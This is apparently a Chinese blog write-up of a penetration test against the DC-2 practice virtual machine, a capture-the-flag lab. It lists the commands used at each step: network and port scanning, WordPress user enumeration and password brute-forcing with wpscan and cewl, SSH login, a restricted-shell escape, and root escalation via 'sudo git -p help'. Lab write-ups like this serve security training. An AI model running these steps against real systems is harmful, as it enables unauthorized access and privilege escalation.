DC-2主机渗透

提示:本文章主要讲解DC-2主机渗透全过程


以下是本篇文章正文内容可供参考:

一、配置

DC-2主机渗透

网络适配器打开VMnet8;

在VMware中文件 -- 打开 -- 导入DC-2;

开启kali、DC-2.

kali作为攻击机 ip地址:192.168.200.132

DC-2 ip:192.168.200.133

注:确保靶机和攻击机在同一网段,设置同一网络连接方式:kali、DC-2虚拟机设置-网络适配器使用NAT模式.

二、步骤

1.扫描靶机IP:

arp-scan -l

2.扫描靶机开放端口及服务

nmap -sV -p- 192.168.200.133

3.浏览器访问http服务

 访问失败

4.修改/etc/hosts文件,手动dns绑定

cat /etc/hosts
vi /etc/hosts

 再次访问成功,找到flag1.

发现了flag1给出的提示是:需要使用cewl工具破解密码,用一个身份登录后,能找到下一个flag

所以接下来会用到cewl工具破解密码。使用cewl破解密码前,要先找到该页面的后台登录地址

5.使用目录扫描工具dirb

扫描出目标靶机登陆地址:http://dc-2/wp-admin/admin.php

dirb http://dc-2

 

 访问页面

6.利用wpscan收集登录的账户信息

wpscan --url http://dc-2 -e u

7.制定用户名字典

vi user.txt

8.利用cewl生成口令字典

cewl http://dc-2 -w password.txt

9.利用wpscan进行爆破

wpscan --url http://dc-2 -U user.txt -P password.txt

10.用爆破出来的用户名和密码登录

登陆成功

找到flag2

11.利用爆破出来的用户名和口令ssh远程登录

使用jerry用户被拒绝登录,换tom用户登录成功

ssh jerry@dc-2 -p 7744
ssh tom@dc-2 -p 7744

12.查看文件信息,找到flag3.txt

命令受限,提示-rbash,百度搜索-rbash,实现绕过

13.绕过-rbash

BASH_CMDS[a]=/bin/sh;a    
export PATH=$PATH:/bin/  
export PATH=$PATH:/usr/bin

找到flag3并查看

14.切换jerry用户

su -jerry

 进入家目录:cd /home/jerry

 ls看到flag4.txt

15.提权

列出当前用户可以使用的所有sudo命令

sudo -l

 发现git命令是root不用命令即可执行,百度搜索git提权

sudo git -p help

在最底下面输入  !/bin/bash

完成提权,进入root根目录,发现final-flag.txt

成功!


总结

以上就是DC-2主机渗透的全部内容。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值